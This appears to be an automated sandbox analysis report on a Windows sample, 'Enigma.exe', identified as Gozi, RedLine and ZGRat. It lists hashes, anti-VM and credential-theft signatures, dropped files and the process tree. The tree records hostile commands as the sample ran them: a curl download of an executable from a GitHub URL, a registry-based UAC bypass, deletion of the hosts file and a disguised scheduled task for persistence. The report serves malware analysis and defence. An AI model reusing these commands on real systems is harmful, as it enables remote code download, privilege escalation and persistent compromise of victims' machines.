Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2024, 22:03

General

  • Target

    Enigma.exe

  • Size

    1.2MB

  • MD5

    d0f80a39b6f0a3beac677c6846c3b41a

  • SHA1

    d7b1f3b1b53fa474247f9d4e63b959aa902866a4

  • SHA256

    3ef10a8b44eb13fc45d40ced592fe9f1a83e6b021b3681da61f7cce688304047

  • SHA512

    38cf9347f60cfa8a700f040e647deaac3309db71919b508ef7bf82f39b3497a5124413cdaae2ddc522200b23ab4c832f7c6ba72e673c8496ee8a36326c889270

  • SSDEEP

    24576:3stMPfK4jgsfALDEx/AoO0RwqvpVQqblqJRYu/UZfh+n6A6qtFa:3stb+Jlp3gJerIn6ApF

Malware Config

Extracted

Family

gozi

Signatures

  • Detect ZGRat V1 3 IoCs
  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3440
    • C:\Users\Admin\AppData\Local\Temp\Enigma.exe
      "C:\Users\Admin\AppData\Local\Temp\Enigma.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VirtualBox Guest Additions in registry
      • Checks BIOS information in registry
      • Checks computer location settings
      • Drops file in System32 directory
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4348
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start https://discord.gg/P5448HTPrE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4596
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/P5448HTPrE
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4556
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff3dc646f8,0x7fff3dc64708,0x7fff3dc64718
            5⤵
              PID:1360
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
              5⤵
                PID:3648
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                5⤵
                  PID:4064
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
                  5⤵
                    PID:2120
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                    5⤵
                      PID:2096
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
                      5⤵
                        PID:1220
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
                        5⤵
                          PID:468
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c color D
                      3⤵
                        PID:2960
                      • C:\Windows\SysWOW64\kdmapper.exe
                        "C:\Windows\SysWOW64\kdmapper.exe"
                        3⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:1436
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\appledamage91697.vbs" /f
                          4⤵
                          • Modifies registry class
                          PID:1140
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
                          4⤵
                          • Modifies registry class
                          PID:4132
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /C computerdefaults.exe
                          4⤵
                            PID:3604
                            • C:\Windows\SysWOW64\ComputerDefaults.exe
                              computerdefaults.exe
                              5⤵
                                PID:1740
                                • C:\Windows\SysWOW64\wscript.exe
                                  "wscript.exe" C:\Users\Admin\AppData\Local\Temp\appledamage91697.vbs
                                  6⤵
                                  • Checks computer location settings
                                  PID:3564
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                                    7⤵
                                      PID:4960
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN VisualStudioUpdater_GyFeCElfnPIBLRXma050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\GyFeCElfnPIBLRXma050MX.exe" /RL HIGHEST /IT
                                4⤵
                                  PID:3388
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /Create /SC ONLOGON /TN VisualStudioUpdater_GyFeCElfnPIBLRXma050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\GyFeCElfnPIBLRXma050MX.exe" /RL HIGHEST /IT
                                    5⤵
                                    • Creates scheduled task(s)
                                    PID:2868
                                • C:\Users\Admin\AppData\Local\Temp\gyiczj2g.exe
                                  "C:\Users\Admin\AppData\Local\Temp\gyiczj2g.exe" explorer.exe
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2068
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c curl --silent https://raw.githubusercontent.com/killebolaaaaaaaaaaaaaaaaa/pizdechui/main/mservice64.exe --output C:\Windows\SysWOW64\physmeme.exe
                                3⤵
                                  PID:3416
                                  • C:\Windows\system32\curl.exe
                                    curl --silent https://raw.githubusercontent.com/killebolaaaaaaaaaaaaaaaaa/pizdechui/main/mservice64.exe --output C:\Windows\SysWOW64\physmeme.exe
                                    4⤵
                                    • Drops file in System32 directory
                                    PID:4920
                                • C:\Windows\SysWOW64\physmeme.exe
                                  "C:\Windows\SysWOW64\physmeme.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2608
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1368
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:448
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4336

                                Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        152B

                                        MD5

                                        104aab1e178489256a1425b28119ec93

                                        SHA1

                                        0bcf8ad28df672c618cb832ba8de8f85bd858a6c

                                        SHA256

                                        b92c19f079ef5948cb58654ce76f582a480a82cddc5083764ed7f1eac27b8d01

                                        SHA512

                                        b4f930f87eb86497672f32eb7cc77548d8afb09ad9fdba0508f368d5710e3a75c44b1fd9f96c98c2f0bd08deb4afde28330b11cf23e456c92cc509d28677d2cf

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        152B

                                        MD5

                                        846ce533b9e20979bf1857f1afb61925

                                        SHA1

                                        4c6726618d10805940dba5e6cf849448b552bf68

                                        SHA256

                                        b81574d678f49d36d874dc062a1291092ab94164b92f7e30d42d9c61cc0e77c3

                                        SHA512

                                        8fb228fae89f063159dabc93871db205d836bdb4ec8f54a2f642bd0b1ac531eea0c21234a8ca75a0ae9a008d2399a9bf20a481f5d6a6eab53a533cd03aeaaa2c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                        Filesize

                                        312B

                                        MD5

                                        34924e3e6e46693dd37aafda6e5f4f30

                                        SHA1

                                        f803ca700e07e7003e7ff82c356f86a907ee10f1

                                        SHA256

                                        3400a3c5c79a598401970870cd8595f2b5e5b59253fa001d43a70b43609aba7b

                                        SHA512

                                        8be0ed23eff4aab988db4fea0ad9c3c9a9c37f58e5c77a6ca7f7e2c4ff2623f4bf3015c7d20e46ba479dc4c303e8423bf5824b3550d6d62b091ecfa190011089

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                        Filesize

                                        20KB

                                        MD5

                                        c36e2444ddef9c7c53ef59244a291631

                                        SHA1

                                        ea8d42515ca7c61a16dbb1f76c1359fd4ac64898

                                        SHA256

                                        d8a71d5bf7055f38b7e51f6876aef0fcb326adfe5dfb0d2df867ddbd43c0031e

                                        SHA512

                                        cb37637ec58d27351b6367f6a910eff579e75ef3574b4472d4674467941849326ff7f0353b754e138a1a1b6744c2f4fd163c6850d629e25ccc38d4bb7a8ba5c3

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                        Filesize

                                        334B

                                        MD5

                                        d96740baf1629d077b8620845c624392

                                        SHA1

                                        4d03b3f312750f4a12aed4d0f478951a92374fd2

                                        SHA256

                                        bb0ccbd3c21fd13c481d4e34cc5e07da4c191252ccfc21661dc89f500ed5e323

                                        SHA512

                                        86b20b1e0257c6b18a878174456c9d00f319a94cb2d9134e90ed79914ec57e18d5c5e376743262b9d224eae51c8a9706f1466d7da41edf1db8bdcd028a868cfd

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                        Filesize

                                        247B

                                        MD5

                                        94bd83393ee4e3c749f28c3414160cbc

                                        SHA1

                                        68effb04ecc392f2ae4ad7bdc1e99b9116da474c

                                        SHA256

                                        e1dbf44fca250f32925910fcd7f59276e46d0d916eff30fdf9f85ef91bcd3d4b

                                        SHA512

                                        203109a405cd685a195e6cdae5d0a624abcd6c6a9333b88f312e50f96bafa03057366bd78bf62df8784ec97f14677d56f8b78b472000044618a784bcf7af3e8a

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                        Filesize

                                        6KB

                                        MD5

                                        f3b93a43119f6b014b3197cc908d5a68

                                        SHA1

                                        7fc4da5add1211ee50bd70f9eef037ec27f59931

                                        SHA256

                                        0932d16c7250bb930711e21a3eae9cdf77fad5e3b1c264b944173452a8f4e4f1

                                        SHA512

                                        25c3a5aff2cc126e04a6a427a6db29f57d2081c1251fa50b0b4c3fbf8f3959e0e215b7c03c11368e5bdc72a65110e463e109dbe60e7d12a4af116b552849bb91

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                        Filesize

                                        6KB

                                        MD5

                                        adb34f00e40d7d737a0bf2d4a7b687e8

                                        SHA1

                                        e4b28f54f3c81b1a101ab220207eeb600b812195

                                        SHA256

                                        da14deb33a08558a31286fa1889a5a69dddf1a7add511945177f94405637d571

                                        SHA512

                                        119fda9a360d09fada05beb58c7eb926dd9307240327d3e5da699a97bc36a3330ceed007bf238fac3228442da49d31dee1bd04e51eddd4319f8853381ba00fe6

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        11KB

                                        MD5

                                        3ed4a31655aab30dcbc22df9a825cdfd

                                        SHA1

                                        0770e3d233ca92ee510e970c55bf574f4c2d7fc9

                                        SHA256

                                        344ca1253e70261245db028615e7607eba653da7e8f725b3ab64bd975dc41cf1

                                        SHA512

                                        336b2c602dbc2d021aa888d7a60138732d8e92083792a8f1eb3ae10e236c63b003bdfd8371deae8534830f2af8c68cdceaf896c38fcb08add629dea886b82b2a

                                      • C:\Users\Admin\AppData\Local\Temp\4520e2cd64b54b85a3a3d0882d45af93

                                        Filesize

                                        46KB

                                        MD5

                                        8f5942354d3809f865f9767eddf51314

                                        SHA1

                                        20be11c0d42fc0cef53931ea9152b55082d1a11e

                                        SHA256

                                        776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

                                        SHA512

                                        fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

                                      • C:\Users\Admin\AppData\Local\Temp\4550372c9a214044b74ca7bb2546e77b

                                        Filesize

                                        250KB

                                        MD5

                                        cf377fa3e6e43a21d94b9ffdb49c60bd

                                        SHA1

                                        e8347804317a5b68b6cdf773f61cc4f127ef7f5a

                                        SHA256

                                        47176750489ae2286e8f11bc7a2f6bb6ca9891f5675d890a49c5b10a1fae5393

                                        SHA512

                                        5b0d3644acd1cab540f7de0fbe23e0562cab2a05afeb9eb9aca680572c2a6f416011c4633917433e207eaf3f3e4db96c73a19148f21e3218c672e7d055914c19

                                      • C:\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll

                                        Filesize

                                        1.4MB

                                        MD5

                                        6f2fdecc48e7d72ca1eb7f17a97e59ad

                                        SHA1

                                        fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056

                                        SHA256

                                        70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809

                                        SHA512

                                        fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b

                                      • C:\Users\Admin\AppData\Local\Temp\appledamage91697.vbs

                                        Filesize

                                        171B

                                        MD5

                                        a34267102c21aff46aecc85598924544

                                        SHA1

                                        77268af47c6a4b9c6be7f7487b2c9b233d49d435

                                        SHA256

                                        eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44

                                        SHA512

                                        5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3

                                      • C:\Users\Admin\AppData\Local\Temp\gyiczj2g.exe

                                        Filesize

                                        124KB

                                        MD5

                                        e898826598a138f86f2aa80c0830707a

                                        SHA1

                                        1e912a5671f7786cc077f83146a0484e5a78729c

                                        SHA256

                                        df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a

                                        SHA512

                                        6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb

                                      • C:\Users\Admin\AppData\Roaming\Gongle\a0HSR8Q9FA\LOG.old

                                        Filesize

                                        331B

                                        MD5

                                        07d3b35bdf89da3e4f04572feb997e01

                                        SHA1

                                        e68cf9d53e2279e5ea3663c9d37f31b7375b1d92

                                        SHA256

                                        53621042886a856c05ffc10d1c4fc28420878aa308bdb10d4a8d1252e1ea6083

                                        SHA512

                                        0de0a577ef0a9a3f025cfcccaa330b4e47ac5b8466a54f1b3e9125ee161fc33bfc14330d1ce416e568ef20f45f3a817dc011c7e5fdffb0c4d083d0ac4a7d31b0

                                      • C:\Users\Admin\AppData\Roaming\Gongle\aJVXGQGHN7\lazanq5n.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

                                        Filesize

                                        48KB

                                        MD5

                                        a623029e1a42dc3b694868e66e9f23d5

                                        SHA1

                                        5f32b70d9bf41daaccc740fb26d8ba301726216d

                                        SHA256

                                        7a1c31674786429093826e74b89eaa36fc6f4fbe56bef20b05931b9342127d96

                                        SHA512

                                        c28a384dddd3ad7c494d0d20b7c4d46601f372fa979c561990f408cf2051d3b442ecb5f734bebf992ba09433efb65d80ab531496ba7fcd890b3ab0b6ec031069

                                      • C:\Users\Admin\AppData\Roaming\Gongle\aS3HWEXPMF\CURRENT

                                        Filesize

                                        16B

                                        MD5

                                        46295cac801e5d4857d09837238a6394

                                        SHA1

                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                        SHA256

                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                        SHA512

                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                      • C:\Users\Admin\AppData\Roaming\Gongle\aS3HWEXPMF\LOG

                                        Filesize

                                        332B

                                        MD5

                                        ffe737fbd591da104908a52f17c5968c

                                        SHA1

                                        db9d328d2d9cac44324063ecc159c950e6abd607

                                        SHA256

                                        520e6a16244f1cc7ac657a939404ab0c6c3c33ad50d2616c91c3b23f4bf354e6

                                        SHA512

                                        b0905af2da5fe304d9782152ff2c30ed5fd3d1ac3fd18127011c604345229a182f4638952548fea7d67bd49b30b68de5f87d73132d2e1965667d4ec3c3970bde

                                      • C:\Users\Admin\AppData\Roaming\Gongle\aS3HWEXPMF\LOG.old

                                        Filesize

                                        291B

                                        MD5

                                        23cce48b97ab1576b002665b9f28fa66

                                        SHA1

                                        a4f88547962069b45da75600edd3249aecb09661

                                        SHA256

                                        a4d2072c1b5a950fa079fed86d255958221fe918bc33a4ea295b1ab1030285c8

                                        SHA512

                                        09dc32f51cc9f808dc49fbf9f92cdeb64bd0a9f3f42dcfa8b9b77832df5e572c624cd4f1357312255d7486c4c8204420f23193ce888c61ad5d1a2ab3f4061e20

                                      • C:\Users\Admin\AppData\Roaming\Gongle\aS3HWEXPMF\MANIFEST-000001

                                        Filesize

                                        41B

                                        MD5

                                        5af87dfd673ba2115e2fcf5cfdb727ab

                                        SHA1

                                        d5b5bbf396dc291274584ef71f444f420b6056f1

                                        SHA256

                                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                        SHA512

                                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                      • C:\Windows\SysWOW64\kdmapper.exe

                                        Filesize

                                        12KB

                                        MD5

                                        cc67c1499b02ac9a13501ee55c83ba95

                                        SHA1

                                        abffcbe78b02967d9d695ef369f36798f1558854

                                        SHA256

                                        7d71e02e5034e079ba05eab36632850b8c25523eee94a77ac6e76efb8911558b

                                        SHA512

                                        15124a9df7787b31c5ba6bb19906f50f1b16f2515a0de535efe119ddd1801770684146dc07c2476180250ae6768c69800f3aedbb251f3ff826fc34340c0e31b7

                                      • C:\Windows\SysWOW64\physmeme.exe

                                        Filesize

                                        798KB

                                        MD5

                                        0b4d5b034710bc8ed5ad5e2101cbd41e

                                        SHA1

                                        78d32c39bbadbfe1652f6859237304a2b3c9840b

                                        SHA256

                                        ba443bd7942da49b1df9625418c9e2bb5d0cb26cb3a281073b31f6896b61eded

                                        SHA512

                                        bd98ec0d9d0503d754a61b1d2639150ff429e716f08425ff25b0a0ebe7f24e78c658c1ad2308300afe18c7b08a41e6fb8fb4cae75aee24c3eea3aaa3374aaff2

                                      • memory/1368-174-0x0000000074580000-0x0000000074D30000-memory.dmp

                                        Filesize

                                        7.7MB

                                      • memory/1368-177-0x00000000055C0000-0x00000000055D0000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1368-201-0x0000000006450000-0x0000000006462000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/1368-202-0x00000000064B0000-0x00000000064EC000-memory.dmp

                                        Filesize

                                        240KB

                                      • memory/1368-203-0x0000000006630000-0x000000000667C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/1368-184-0x00000000069B0000-0x0000000006FC8000-memory.dmp

                                        Filesize

                                        6.1MB

                                      • memory/1368-212-0x0000000006740000-0x00000000067A6000-memory.dmp

                                        Filesize

                                        408KB

                                      • memory/1368-219-0x00000000070D0000-0x0000000007146000-memory.dmp

                                        Filesize

                                        472KB

                                      • memory/1368-221-0x0000000006930000-0x000000000694E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/1368-200-0x0000000006520000-0x000000000662A000-memory.dmp

                                        Filesize

                                        1.0MB

                                      • memory/1368-226-0x00000000083F0000-0x00000000085B2000-memory.dmp

                                        Filesize

                                        1.8MB

                                      • memory/1368-170-0x0000000000400000-0x000000000044A000-memory.dmp

                                        Filesize

                                        296KB

                                      • memory/1368-228-0x0000000008DB0000-0x00000000092DC000-memory.dmp

                                        Filesize

                                        5.2MB

                                      • memory/1368-181-0x0000000005290000-0x000000000529A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/1368-232-0x0000000074580000-0x0000000074D30000-memory.dmp

                                        Filesize

                                        7.7MB

                                      • memory/1436-396-0x0000000000C70000-0x0000000000D22000-memory.dmp

                                        Filesize

                                        712KB

                                      • memory/1436-399-0x000000000CE60000-0x000000000CECA000-memory.dmp

                                        Filesize

                                        424KB

                                      • memory/1436-233-0x0000000074580000-0x0000000074D30000-memory.dmp

                                        Filesize

                                        7.7MB

                                      • memory/1436-425-0x0000000002B00000-0x0000000002B10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1436-421-0x000000000DD70000-0x000000000DD7A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/1436-41-0x0000000074580000-0x0000000074D30000-memory.dmp

                                        Filesize

                                        7.7MB

                                      • memory/1436-253-0x0000000007670000-0x0000000007682000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/1436-252-0x0000000002B00000-0x0000000002B10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1436-40-0x0000000000C60000-0x0000000000C6C000-memory.dmp

                                        Filesize

                                        48KB

                                      • memory/1436-406-0x000000000CEF0000-0x000000000CF11000-memory.dmp

                                        Filesize

                                        132KB

                                      • memory/1436-405-0x000000000CF30000-0x000000000CF6C000-memory.dmp

                                        Filesize

                                        240KB

                                      • memory/1436-262-0x0000000008C70000-0x0000000008C7A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/1436-263-0x0000000002B00000-0x0000000002B10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1436-264-0x000000000AAE0000-0x000000000AAEC000-memory.dmp

                                        Filesize

                                        48KB

                                      • memory/1436-265-0x0000000008BC0000-0x0000000008BC8000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/1436-227-0x000000000AE00000-0x000000000BA00000-memory.dmp

                                        Filesize

                                        12.0MB

                                      • memory/1436-401-0x0000000008BD0000-0x0000000008C1C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/1436-54-0x00000000057D0000-0x0000000005D74000-memory.dmp

                                        Filesize

                                        5.6MB

                                      • memory/1436-47-0x0000000005180000-0x0000000005212000-memory.dmp

                                        Filesize

                                        584KB

                                      • memory/1436-45-0x0000000002B00000-0x0000000002B10000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1436-44-0x0000000002B30000-0x0000000002B3A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/1436-42-0x0000000002B10000-0x0000000002B2A000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/1436-400-0x000000000D9E0000-0x000000000DD34000-memory.dmp

                                        Filesize

                                        3.3MB

                                      • memory/1436-397-0x00000000068A0000-0x00000000068C2000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/1436-398-0x000000000CCF0000-0x000000000CD40000-memory.dmp

                                        Filesize

                                        320KB

                                      • memory/1436-234-0x0000000012F70000-0x0000000013C12000-memory.dmp

                                        Filesize

                                        12.6MB

                                      • memory/2608-171-0x0000000000690000-0x000000000075C000-memory.dmp

                                        Filesize

                                        816KB

                                      • memory/2608-172-0x0000000000690000-0x000000000075C000-memory.dmp

                                        Filesize

                                        816KB

                                      • memory/3440-255-0x0000000001060000-0x0000000001068000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/3440-256-0x0000000001060000-0x0000000001068000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/3440-250-0x0000000002C30000-0x0000000002C31000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3440-251-0x0000000001060000-0x0000000001068000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/3440-249-0x0000000001060000-0x0000000001068000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/4348-225-0x00007FF68CA00000-0x00007FF68CB42000-memory.dmp

                                        Filesize

                                        1.3MB